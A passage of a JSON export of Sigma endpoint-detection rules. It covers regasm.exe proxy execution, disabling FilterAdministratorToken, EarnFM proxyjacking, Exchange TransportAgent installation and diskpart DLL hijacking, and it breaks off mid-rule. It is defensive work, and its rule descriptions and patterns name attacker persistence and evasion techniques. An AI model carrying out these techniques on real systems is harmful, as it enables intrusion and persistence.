*\\esprit.charmillestechnologymanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.optionsconfiguration.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threaddatabase.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.threadlayer.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /register /s cgm.axilibraries.interop.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe */silent* *\\programs\\sap businessobjects\\epm 
add-in\\epmofficeactivex.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe stellarexcel.dll /tlb:com.stellarexcel.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /tlb /codebase robotconnectionaddin.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsprintdvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe tsscandvc64.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u contextmenuhandler64.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /u ?:/program files/common files/wondershare/pdfelement??/preview/*/pepreview?.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\\\regasm.exe /unregister ?:/program files/atempo/tina/bin/libtina_comps_clr4.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\becpwin\\gfxgateway*.dll /regfile:*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coalaclient\\gatewaycs.dll /tlb:*\\coalaclient\\gatewaycs.tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\revao\\exe\\eic.global.interop.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\masslynx\\acquitywrapper.dll /silent /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase seedkey*.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\system32\\farpoint.spread8.excel2007.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\opentrust\\fncopentrust.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\allegoria\\classfncallegoria.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\converttopdf\\fiducial.notaire.compta.rao.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fiducialwrappermailboxplanete\\fiducial.wrappermailboxplanetecompta.dll'\n - 
'?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\dll\\fnc_scan\\fnc_scan.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\ifiducial_fnc.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm /* *\\wrapper_clotureaffaire.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm *\\ceniber\\autonet\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\diamic\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cashdrawer.dll /tlb:cls_cashdrawer.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_cfd.dll /tlb:cls_cfd.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_depileuraures.dll /tlb:cls_depileuraures.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe cls_print.dll /tlb:cls_print.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /silent *\\dedalus\\meds\\soins\\v7\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /codebase /tlb fiducial.rao.wordaddin.interop.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\batigestconnect\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\sage-paie\\declarations sociales\\client\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\b1crufl.dll /register /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ?:\\windows\\syswow64\\sagelcp.dll /s /nolog /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\fiducial.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\winnot.200\\assemblies\\lexisnexis.winnotaires.*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\coloris\\activex\\interfacecoffrefort\\cosolucecoffrefortclient.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe ecs2000.*.dll*'\n - 
'?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe *\\paie\\sagepaie\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo *\\salarior\\bus_bl\\pes\\bl.sante.interop.iparapheur.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcsmmclib.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /nologo /verbose *?:\\windows\\syswow64\\dcstraceconsole.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent ?:\\windows\\syswow64\\annoterpdf2.dll tlb ?:\\windows\\syswow64\\annoterpdf2.tlb /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /silent impac.mosaiq.charting.documents.mergefields.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe stange.*.dll*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\\\regasm.exe stinterfaces.dll /codebase /tlb:?:\\program files (x86)\\philips\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\pacom.gms.extendedconfiguration.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.drive.drivetextserver.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /tlb /codebase *\\indraworks ds\\indraworks.utilities.dll'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm.exe /u *\\kansysedge\\rmp\\bin\\\\*'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm fiducial.transim.comstarter.dll /codebase /tlb'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm interop.msutil.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework\\\\*\\regasm jdsu.fit.fiberchek.automation.dll /codebase'\n - '?:\\WINDOWS\\Microsoft.NET\\Framework*\\\\*\\regasm.exe /silent /codebase ?:\\ProgramData\\SOLIDWORKS\\\\*'\n\n exclusion_legitimate_grandparent:\n ProcessGrandparentCommandLine:\n # Ignore shares as they may 
often host legitimate installers\n - '\\\\\\\\*\\\\*'\n # SCCM\n - '?:\\Windows\\ccmcache\\\\*'\n # Legitimate apps\n - '?:\\Becpwin\\\\*'\n - '*\\Cosoluce\\bigjim\\Supernova.Client.BigJim.Service.exe'\n - '?:\\Windows\\Temp\\MW-????????-????-????-????-????????????\\setup_QBloc_*.exe'\n - '?:\\ProgramData\\Edisys\\SPIGAO\\iulm\\SPIGAOConnect_Setup-PROD.exe'\n\n exclusion_innosetuptools:\n CommandLine:\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /codebase /tlb ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\InnoSetupTools.dll'\n - '*\\RegAsm.exe /s /u ?:\\WINDOWS\\TEMP\\is-?????.tmp\\InnoSetupTools.dll'\n\n exclusion_lenovo:\n CommandLine:\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\\\*\\PluginsContract.dll'\n - '*\\RegAsm.exe /silent*?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\PluginsContract.dll'\n\n exclusion_archimed_docmaker:\n ParentImage|endswith: '\\ArchimedDocMakerRegister.exe'\n CommandLine|contains: 'Achimed.DocMaker*.dll'\n\n exclusion_solu_qiq:\n ParentImage|endswith: '\\SOLU-QIQ Base *.*.*.exe'\n CommandLine|contains:\n - 'Convertisseur.dll'\n - 'ADAuthentication.dll'\n\n exclusion_wrapper_webview:\n ParentImage|endswith: 'WrapperWebView2.exe'\n ParentCommandLine|contains: '/ACTION=INSTALL'\n CommandLine|contains:\n - 'Microsoft.Web.WebView2.WinForms.tlb'\n - 'Microsoft.Web.WebView2.Core.tlb'\n\n exclusion_bat_emc:\n ParentImage|endswith: 'Setup_BAT-EMC_*.*.*.*.exe'\n CommandLine|contains:\n - 'VisuMonitoring.dll'\n - 'BatEmcBridge.dll'\n - 'SpectrogramActiveX.dll'\n\n exclusion_ivanti:\n ParentImage|endswith: '\\Ivanti20??-*\\Setup.exe'\n CommandLine|contains: 'Interop.ComUtilitiesLib.dll'\n\n exclusion_inot_office:\n ParentImage|endswith:\n - '\\GenApi.iNot.RegisterCOMComponants.exe'\n - 
'\\GenApi.CTI.Launcher.exe'\n CommandLine|contains:\n - '\\GenApi.iNot.Client.FramePlayer.DLL'\n - '\\GenApi.CTI.Data.iNot.dll'\n\n exclusion_fiducial:\n GrandparentImage|endswith:\n - '\\majfuposte.exe'\n - 'fncgf_evaluationprivilege.exe'\n ParentCommandLine|contains: '\\AppData\\Roaming\\fiducial\\compta\\'\n\n exclusion_water_ics:\n GrandparentImage|endswith: 'Waters\\ICS\\Companion\\ICSCompanionSvc.exe'\n ParentImage|endswith: 'Waters\\ICS\\Companion\\SetupHelper.exe'\n CommandLine|endswith: 'Waters.*.*.dll'\n\n exclusion_dolby:\n GrandparentImage|endswith: '\\DAX3API.EXE'\n ParentCommandLine|endswith: '\\DAX3APIDLL.dll'\n\n exclusion_mosaiq:\n GrandparentImage|endswith: '\\SetupMosaiq.tmp'\n ParentImage|endswith: '\\RegisterAssemblies.exe'\n\n exclusion_sage1:\n - GrandparentImage|endswith:\n - '\\Sagedirect.exe'\n - '\\SageDS_*_*_*.exe'\n - ParentCommandLine|contains:\n - '\\SageDS\\Client\\InstallShieldEnregistrementCOM.bat'\n - 'Sagedirect*.exe'\n exclusion_sage2:\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'SAGE SAS'\n\n exclusion_common_dlls:\n CommandLine|contains:\n - 'GenApi.iNot.*.*.dll'\n - 'GdPicture.NET.*.dll'\n\n exclusion_sap_se:\n ParentImage|endswith: '\\NwSapSetup.exe'\n CommandLine|contains:\n - 'sapnco.dll'\n - 'rscp4n.dll'\n\n exclusion_atempo:\n ParentImage: '?:\\Program Files\\Atempo\\TimeNavigator\\\\*\\Bin\\tina_*.exe'\n\n exclusion_philips:\n ParentImage:\n - '?:\\Program Files\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n - '?:\\Program Files (x86)\\Philips\\CIS\\Bin\\Philips.CIS.MachineSetup.exe'\n\n exclusion_sap:\n ParentImage|endswith: '\\setup\\NwSapSetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'SAP SE'\n\n exclusion_configuration_manager:\n ParentImage|endswith:\n - '\\srvboot.exe'\n - '\\cmupdate.exe'\n - '\\rolesetup.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_kansysedge:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe 
/c *\\kansysedge\\installscripts\\utilities\\reregisterassemblies.bat'\n\n exclusion_genapi:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c *\\genapi\\gupta\\i-not\\regasm_dlls.cmd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4",
"rule_name": "Suspicious Proxy Execution via regasm.exe",
"rule_description": "Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\nThis may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\nAWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\nApplication whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\nThis can also be used by program installers in Windows.\nIt is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.009"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03983a13-d23e-4494-b3c5-9b24bf51acfc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622015Z",
"creation_date": "2026-03-23T11:45:34.622017Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622021Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_disable_filteradministratortoken.yml",
"content": "title: Network UAC Restrictions Disabled for Local Administrator\nid: 03983a13-d23e-4494-b3c5-9b24bf51acfc\ndescription: |\n Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\n By default this value is not set but adversaries may try to change it to circumvent a hardening policy.\n This will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\n It is recommended to investigate any suspicious authentication using the local administrator account.\nreferences:\n - https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/12/27\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.lateral_movement\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\FilterAdministratorToken'\n Details|contains: '?WORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_local_security_policy:\n 
ProcessImage|endswith: '\\services.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_winoobe:\n ProcessGrandparentImage: '?:\\Windows\\System32\\setupugc.exe'\n\n exclusion_omadmclient:\n ProcessImage: '?:\\WINDOWS\\system32\\omadmclient.exe'\n\n exclusion_defender:\n ProcessImage: '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_logmein:\n ProcessImage: '?:\\Program Files (x86)\\LogMeIn\\x64\\LogMeIn.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03983a13-d23e-4494-b3c5-9b24bf51acfc",
"rule_name": "Network UAC Restrictions Disabled for Local Administrator",
"rule_description": "Detects when the Network UAC for the local administrator account is disabled by setting the FilterAdministratorToken registry value.\nBy default this value is not set but adversaries may try to change it to circumvent a hardening policy.\nThis will enable an attacker to connect remotely to the machine (WMI, SCM, SMB, ...) using the local administrator account with full privileges.\nIt is recommended to investigate any suspicious authentication using the local administrator account.\n",
"rule_creation_date": "2023-12-27",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613613Z",
"creation_date": "2026-03-23T11:45:34.613616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613624Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_earnfm.yml",
"content": "title: EarnFM Executed\nid: 039f1d5b-74b0-46d1-8a0e-dfa8bea707bd\ndescription: |\n Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\n Attackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trendmicro.com/en_gb/research/23/b/hijacking-your-bandwidth-how-proxyware-apps-open-you-up-to-risk.html\n - https://attack.mitre.org/techniques/T1496/\ndate: 2024/09/26\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.PUA.EarnFm\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: ' EARNFM_TOKEN='\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "039f1d5b-74b0-46d1-8a0e-dfa8bea707bd",
"rule_name": "EarnFM Executed",
"rule_description": "Detects the usage of EarnFM, a bandwidth monetization platform similar to Traffmonetizer.\nAttackers can use this tool to perform Proxyjacking, a form of cyber exploitation where an attacker hijacks a user's Internet connection to use it as a proxy server for malicious purposes or illegal monetization.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-02-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03a594fd-50c7-4041-9c5c-706a4009f30a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072500Z",
"creation_date": "2026-03-23T11:45:34.072502Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072506Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_new_exchange_transport_agent_powershell.yml",
"content": "title: New Exchange TransportAgent Installed via PowerShell\nid: 03a594fd-50c7-4041-9c5c-706a4009f30a\ndescription: |\n Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/05/26\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_cmdlet:\n PowershellCommand|contains: 'Install-TransportAgent '\n\n selection_assemblypath:\n PowershellCommand|contains:\n - ' -A ' # -AssemblyPath\n - ' -As ' # -AssemblyPath\n - ' -Ass ' # -AssemblyPath\n - ' -Asse ' # -AssemblyPath\n - ' -Assem ' # -AssemblyPath\n - ' -Assemb ' # -AssemblyPath\n - ' -Assembl ' # -AssemblyPath\n - ' -Assembly ' # -AssemblyPath\n - ' -AssemblyP ' # -AssemblyPath\n - ' -AssemblyPa ' # -AssemblyPath\n - ' -AssemblyPat ' # -AssemblyPath\n - ' -AssemblyPath ' # -AssemblyPath\n\n selection_transportagent:\n 
PowershellCommand|contains:\n - ' -T ' # -TransportAgentFactory\n - ' -Tr ' # -TransportAgentFactory\n - ' -Tra ' # -TransportAgentFactory\n - ' -Tran ' # -TransportAgentFactory\n - ' -Trans ' # -TransportAgentFactory\n - ' -Transp ' # -TransportAgentFactory\n - ' -Transpo ' # -TransportAgentFactory\n - ' -Transpor ' # -TransportAgentFactory\n - ' -Transport ' # -TransportAgentFactory\n - ' -TransportA ' # -TransportAgentFactory\n - ' -TransportAg ' # -TransportAgentFactory\n - ' -TransportAge ' # -TransportAgentFactory\n - ' -TransportAgen ' # -TransportAgentFactory\n - ' -TransportAgent ' # -TransportAgentFactory\n - ' -TransportAgentF ' # -TransportAgentFactory\n - ' -TransportAgentFa ' # -TransportAgentFactory\n - ' -TransportAgentFac ' # -TransportAgentFactory\n - ' -TransportAgentFact ' # -TransportAgentFactory\n - ' -TransportAgentFacto ' # -TransportAgentFactory\n - ' -TransportAgentFactor ' # -TransportAgentFactory\n - ' -TransportAgentFactory ' # -TransportAgentFactory\n\n exclusion_fsecure:\n PowershellCommand|contains: 'Install-TransportAgent -Name $AGENT -AssemblyPath $AGINSTDIR\\fstragnt.dll'\n\n exclusion_kaspersky:\n PowershellCommand|contains|all:\n - 'Kaspersky Security '\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Microsoft Exchange Servers\\Kse.ExchangeIntegration.Transport.dll'\n\n exclusion_trendmicro:\n ProcessImage: '?:\\Program Files\\Trend Micro\\Smex\\instSetupHelper.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "03a594fd-50c7-4041-9c5c-706a4009f30a",
"rule_name": "New Exchange TransportAgent Installed via PowerShell",
"rule_description": "Detects the installation of a new TransportAgent on an Exchange server via PowerShell.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the DLL installed by inspecting the cmdlet arguments.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-05-26",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "03d8eca6-3f1e-4d11-b989-2c6762458061",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587248Z",
"creation_date": "2026-03-23T11:45:34.587252Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587259Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_diskpart.yml",
"content": "title: DLL Hijacking via diskpart.exe\nid: 03d8eca6-3f1e-4d11-b989-2c6762458061\ndescription: |\n Detects potential Windows DLL Hijacking via diskpart.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - 